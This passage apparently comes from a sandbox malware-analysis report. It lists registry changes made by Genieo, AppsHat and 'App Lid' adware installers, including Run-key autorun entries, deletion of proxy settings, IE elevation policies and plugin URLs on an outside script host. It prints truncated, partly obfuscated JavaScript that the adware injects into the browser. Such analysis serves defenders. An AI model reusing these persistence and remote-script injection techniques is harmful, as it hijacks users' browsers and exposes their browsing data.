"DataDir" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data"
[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"framework_dl" = "300"
"jre_dl_and_install" = "600"
"framework_inst" = "1500"
[HKCU\Software\Genieo]
"set_homepage" = "0"
[HKCU\Software\Genieo\Components\Updater\Genieo]
"PrepEnv" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\prepenv_setup.exe"
[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"firefox_ext_inst" = "10"
"trayapp_inst" = "10"
[HKCU\Software\Genieo\Components\Updater\Genieo]
"firstTime" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\firsttime_setup.exe"
[HKCU\Software\Genieo]
"set_searchProvider" = "0"
[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"firefox_ext_dl" = "60"
[HKCU\Software\Genieo]
"InstallDir" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application"
[HKCU\Software\Genieo\Components\Updater\Genieo]
"Log" = "1"
[HKCU\Software\Genieo\Components\Updater\Genieo\Components]
"Main" = "1"
[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"ieplugins_dl" = "60"
To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GenieoUpdaterService" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\genupdater.exe -wait 5"
"GenieoSystemTray" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\bin\gentray.exe"
The process cscript.exe:3120 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]
"DisplayVersion" = "2.13"
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\icons\tray.ico"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "41 6E E2 F0 8E 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\uninstall.exe _?=C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat"
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\WebPlayer]
"AppsHat" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]
"DisplayName" = "AppsHat"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4A 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat]
"NoRepair" = "1"
To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"AppsHat" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process MsiExec.exe:3588 makes changes in the system registry.
The Application deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyPDF Converter]
The process MsiExec.exe:1612 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Wow6432Node\AedgePerformanceBCN\MS\5\1]
"InstallTime" = "1422513973"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\SOFTWARE\Wow6432Node\AedgePerformanceBCN\MS\5\1]
"ProductID" = "98"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4F 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{17FE9752-0B5A-4665-84CD-569794602F5C} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF" = "01 00 00 00 00 00 00 00 C6 B8 35 46 8F 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\SOFTWARE\Wow6432Node\AedgePerformanceBCN\MS\5\1]
"Result" = "5"
[HKLM\SOFTWARE\Wow6432Node\AedgePerformanceBCN\P\98\1]
"Result" = "1"
"InstallTime" = "1422513973"
[HKLM\SOFTWARE\Wow6432Node\AedgePerformanceBCN\P\98]
"LastSuccessInst" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
"WpadNetworkName" = "Network"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKLM\SOFTWARE\Wow6432Node\AedgePerformanceBCN\P\98\1]
"Campaign" = "14765"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionTime" = "10 8B 75 0B 8F 3B D0 01"
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "3E 76 5F 11 8F 3B D0 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process genupdater.exe:3144 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4C 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Genieo\Components\Updater\Genieo]
"PrepEnv" = "0"
[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"gim394750002_inst" = "0"
[HKCU\Software\Genieo\Components\FirstTime]
"UninstallURL" = "http://www.genieo.com/uninstall"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
[HKCU\Software\Genieo]
"InstalledVersionUpdater" = "16741"
[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"framework_dl" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Genieo\Components\Framework\Personalization Framework\Components]
"Upgrading" = "1422513863"
[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"trayapp_dl" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"jre_dl_and_install" = "0"
[HKCU\Software\Genieo]
"InstalledVersionPartner" = "16741"
[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"trayapp_inst" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
"WpadNetworkName" = "Network"
[HKCU\Software\Genieo]
"UID" = "{E8BFA998-168D-400E-B9E0-F41B76A5DFC7}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionTime" = "1A 3B 37 04 8F 3B D0 01"
"WpadDetectedUrl" = ""
[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"gim394750002_dl" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "F7 0D 4A 06 8F 3B D0 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process Vlwgfsqfpaz.exe:3296 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\246]
"Version" = "15"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\40]
"Version" = "4"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\263]
"Version" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\220]
"Version" = "38"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"Name" = "App Lid"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"AppPath" = "%Program Files% (x86)\App Lid"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
"AppPath" = "%Program Files% (x86)\App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\4]
"URL" = "http://js.ourclientinputsrv.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\91]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/91.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\47]
"Version" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\28]
"Name" = "initializer"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\17]
"Version" = "4"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\301]
"Version" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "41 6E E2 F0 8E 3B D0 01"
[HKLM\SOFTWARE\Wow6432Node\Tempo]
"(Default)" = "tempo"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,345,354,253,102,104,180,184,220,195,200,221,223,234,242,255,262,263,281,288,301,177,91,28"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTI2ZTQzNDQ1NjU0NTMwMTE3MGMxOTMxMTEwODU0NGU1MTRiMGIwYzFkMTQ1OTRiNTkxNzE1MDcwMDE5MGEwYzA2NTU1YjE1NWYwODA4MTkwNDA1MGEwYzEyNWExZjBjMTc1NzFhMTEwMTRiMDA0NzQzNTg1YTFhMGQ0YjNjM2IzNTI2M2UzYTMwMmEyMDIwMjYzNjI5MzEyOTNkMjYzNjJkMjEyNzNiMjUyMTMzMzYyYTNjMzYzYjRjMDg1ODFlMDI1NjEzMTEwZDU5NTI1NDRmNDA1NzBjMWIwYzU0M2IzYzI3MjQzYjIyM2EzMTMxMmQyMTMxM2IzNzI0MjEzNjJkMzkyNDIxM2MzYjUwMDcwODFhMTcxZDA0MGQwNzU5MjkyYjMyM2IyYzJiM2EzNjJhMjAzMzI2MmUyMDJkMmIzZDI1MmYyODMzMjYyZTNjMzAzZDNiM2IyYTIwMjkyYjUzNDU2OTU4NDk0NDQzNDYxZTAwMDUxOTEwMmQxYjA4NDE1ZTU2NTYxOTFkMTcwODFhNWU0YzRiMTUxMDFmMGEwMjFiMDEwMTUyNDkxNzVhMTAwMjAyMTUwODBkMGIwMDU4MWExNDFkNGMwYjFjMDY0YzEyNDU0NjQwNTAwMTFjNDYzYjNjMjcyNDNiMjIzYTMxMzEyZDIxMzEzYjMzMmMyNTJjMmQzYzJjMjAzYzM3MjMzNjJlMjAyNzI3MzY0YjBmNGExYzA3NGUxOTBhMWM1NDU1NTM1ZDQyNTIxNDExMTc0NTM2M2IyMDM2MzkyNzIyM2IyYTNjMmMzNjNjMjUyNjI0MmUyNzIyMzUyYzNiM2M0MjA1MGQwMjFkMDYxNTAwMDA1ZTNiMjkzNzIzMjYzMDJiM2IyZDI3MjEyNDJiMzgyNzMwMmMyODI4MmYyMTI0MmIyNDNhMjYyYTM2MmQyNzNiMjk1NjVkNjM0MzU4NDk0NDQxMTQxYTAxMTY\Å–"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\195]
"Name" = "icm_convertmedia_m"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\200]
"Name" = "foxydeal_m"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
"CrPublisherId" = "25286"
[HKCU\Software\AppDataLow\Software\Crossrider]
"Verifier" = "705e42e0bb6c74a04369956d99485df5"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\78]
"Version" = "5"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\234]
"Version" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\195]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/195.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\36]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/36.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\2]
"Version" = "2"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\234]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM2MzYyNDEwYjA0MTkxNjIyMDIxNDRiNTE0MzQxMTgxOTEyMDc0YTU3NDYwMjEwMTcxMTE5MGYxNDVlMWMwODFmMDIwNTExMWUxMjEwMDUwYTFjNDUwYTBkMTYwMjQ5MTExZjU3MGMwODRjMDAwMjFmNDgxZDAzNDcwMTAyMDc1ZTJmMzIyNTI1M2YyYjNhMzkyYTI3MzUzZjM5MjIyMzNkM2IzNDJhMjcyZjMyNDAwNDA1MWEwMDBmNWUzYzJmMmUzNDM4MjMyYjNiMjIyNzI2MjIzMjIzMmYyNDNkMjcyZjI2MjcyZjNlMzMzNTJmMzEyZDM0M2M0NTEyMDMwNzFhMTU0NTM2MzQyMDMxM2YzZTM1MjUzOTNjMmMzOTNjMjIyMDNkMzkzOTMxMzUyYzM0M2M0NTEyMDEwZjE5MWI0NTRiNDc2OTZhNTIwNTEyMDMwMDBiM2MxOTBmNDE0YTRkNDQxZjA0MGMxOTE4NTk0YzVmMDQxNTAzMTEwYzAwMDg0ZDA3MTExOTA3MTExMTBiMWQwYzE2MTEwNTQzMGYxOTE2MTc0NjBkMGM0YzE1MGU0OTE0MDIwYTQ3MDExMDVjMTgwNDAyNGEyZjI3MmEzOTJjMzAyMzNmMmYzMzM1MmEzNjNlMzAyNjIyMzIyZjMzMmYyNzRmMTgxNjAxMTkwOTViMjgyZjNiM2IyNDMwMzAyMjI0MjIzMjIyMjcyYzMzMzcyNjNlMjkyMzMzMmYyYjNjMjkzYzJhMzQzMjM5NTExMjE2MDgwNjA2NWUyZjMyMjUyNTNmMmIzYTM5MmEyNzM1M2YzOTM2MjAyODM2MjUyMjJlMzUzMjM5NTExMjE0MDAwNTA4NWU1MjQxNmM3ZTUyMDgwNTFlMDQwYTFlMjQwMjU1NGE1ODViNTg1NzRmN2E0ZDQ2NTc1MDVhMWYwZTExMTcxOTBlMDcxYjUyNDI0OTMwNDExMDE4MDI"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\104]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGM3ZDUzNDk1NjRmNDQxOTBlMDEwNzIyMDEwNTU0NTU0NjUzMTIwMTAzMDc0OTQ2NTkwZTE2MTg1NDFmMTgxYjFmMTAwMTBlMGExZDFmMDE1OTE0MWMwNDU5MGUwMDE3MTMxOTFlMTYwNzBjNTkwYzBhMTgxZjFiMDM0ODE3MDAwNTFiNWI0OTVjMTQwNzA3MmMwMDEyNTIzOTJlMzkyNzM4MjQyMDNiM2YyYjIzMjMyNTM5M2UzMDNiM2QyOTNjMzMzMzI1M2MzMzI4MmM0ZjA1NWU1YjQxNWMwNjQ1NGE0MzRmMDU1YzViNDE1YzFiMTYxYTE2NTQyOTMwMjUyMzM1MjYyNDI1M2EyZDMzM2QzOTMwMmEyNTI4MzkzMjI0MzMzMDM5NTcxZjBkMDMxOTRlMzYyOTJjMzQzZTI5MjYyNTNlMzcyYzI0MzAyMzI5MmUzMDM5MzMzNjJkMjkzYzMzMzMyNTNjMzMyODJjNGI1YTY1NDY1MTVhNTU1NTFmMDcxZDA2MWMzMzAzMTY1NzRkNTc1MTAxMDIxYjE2MDI0MDVhNTgxNjAzMDA1ODA1MDkxZDE2MGMwMDE2MWYwNTEzMWI0ODEyMTUxODU4MTYxNTBmMWYwMzBmMTAwZTEwNTgxNDFmMDAxMzAxMTI0ZTFlMWMwNDAzNGU1MTUwMGUxNjAxMjUxYzEzNGEyYzM2MzUzZDI5MjIyOTI3M2UzMzM2M2IyOTIzMmYzNjMyMjEyODI0MjYyYjI5MjYyMjJlMjU1MzA0NDY0ZTU5NTAxYzU0NGM0YTUzMDQ0NDRlNTk1MDAxMDcxYzFmNDgyODI4MzAzYjM5M2MzNTIzMzMzMTMyMjUyYzI4MjYzZjM5M2YzYjM4MzIyODJjNGYxMzE3MTIxZjQ3MmEyODM0MjEyNjI1M2MzNDM4M2UzMDI1MjgzNjMxMjIyYTI4MzUzZjMxMjgyNDI2MmIyOTI2MjI"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\246]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/246.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\263]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/263.js"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"AppPath" = "%Program Files% (x86)\App Lid"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
"Policy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\AppDataLow\Software\App Lid]
"ActiveAppId" = "65743"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\2]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/2.js"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
"Policy" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\9]
"Version" = "3"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\345]
"Version" = "6"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\1]
"JavaScript" = "var __a0__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63\x64\x6e\x2e\x6e\x65\x74'].join('')var __a1__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69\x6e\x67\x2d\x61\x70','\x70\x2e\x63\x72\x6f\x73\x73\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a2__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f','\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63','\x64\x6e\x2e\x6e\x65\x74'].join('')var __a3__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69','\x6e\x67\x2d\x61\x70\x70\x2e\x63\x72\x6f\x73\x73','\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a4__ = ['\x68\x74\x74\x70\x3a\x2f','\x2f\x6e\x73\x74\x61\x74','\x73\x2e\x63\x72\x6f\x73','\x73\x72\x69\x64\x65\x72','\x2e\x63\x6f\x6d'].join('')var __a5__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74','\x61\x67\x69\x6e\x67\x2d\x61\x70\x70','\x2e\x63\x72\x6f\x73\x73\x72\x69\x64','\x65\x72\x2e\x63\x6f\x6d'].join('')var __a6__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f','\x75\x72\4Å–"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
"AppName" = "App Lid-buttonutil64.exe"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]8Å–"
[HKLM\SOFTWARE\Wow6432Node\InstalledBrowserExtensions\25286\Status]
"Installed" = "1"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\180]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/180.js"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
"AppPath" = "%Program Files% (x86)\App Lid"
[HKCU\Software\AppDataLow\Software\App Lid\Manifest]
"homepageurl" = "NA"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\252]
"URL" = "http://js.ourclientinputsrv.com/plugins/mins/252.js"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\281]
"Version" = "2"
[HKLM\SOFTWARE\Wow6432Node\App Lid\Installer]
"BundledFirefox" = "1"
[HKCU\Software\AppDataLow\Software\App Lid\Plugins\253]
